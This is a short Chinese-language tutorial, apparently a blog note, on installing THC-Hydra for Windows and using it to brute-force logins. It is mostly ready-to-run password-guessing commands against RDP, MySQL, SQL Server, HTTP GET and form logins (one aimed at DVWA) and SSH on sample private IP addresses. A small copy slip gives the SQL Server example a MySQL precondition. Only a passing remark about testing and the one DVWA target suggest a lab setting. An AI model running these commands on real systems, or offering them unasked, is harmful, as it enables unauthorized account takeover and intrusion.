hydra下載地址:https://github.com/maaaaz/thc-hydra-windows
解壓安裝即可,然后使用命令行(cmd)切到安裝目錄,例如:cd D:\thc-hydra-windows-master>
然后輸入hydra.exe回車,出現以下提示說明安裝成功。(注意:以后使用hydra都要切到安裝目錄才可以使用)
hydra -L 賬戶字典
-l 單個賬戶名
-p 單個密碼
-P 密碼字典
hydra爆破rdp:(前提是目標的遠程連接可以訪問)
hydra -l Administrator -P password.txt rdp://192.168.1.111
hydra爆破mysql:(前提是目標的mysql可遠程訪問)
hydra -l root -P password.txt 192.168.1.111 mysql
hydra爆破sql server:(前提是目標的mysql可遠程訪問)
hydra -l sa -P password.txt 192.168.1.111 mssql
hydra爆破http:( http-get or http-form-post.)
hydra -l admin -P password.txt 192.168.1.111 http-get /login.php
hydra -l admin -P password.txt 192.168.213.135 http-form-post "/dvwa/login.php:user=^USER^&pass=^PASS^:<title>invalide</title"
【注】(user,pass改為賬戶密碼提交表單<label for="">的值)
hydra爆破ssh:( 前提是目標的遠程連接可以訪問)
hydra -l root -P password.txt 192.168.1.111 ssh
注意事項:
1、字典路徑為全英文且不能空格;
2、做測試的時候要確保目標可訪問;
3、所有符號均為英文狀態下輸入;
持續更新中...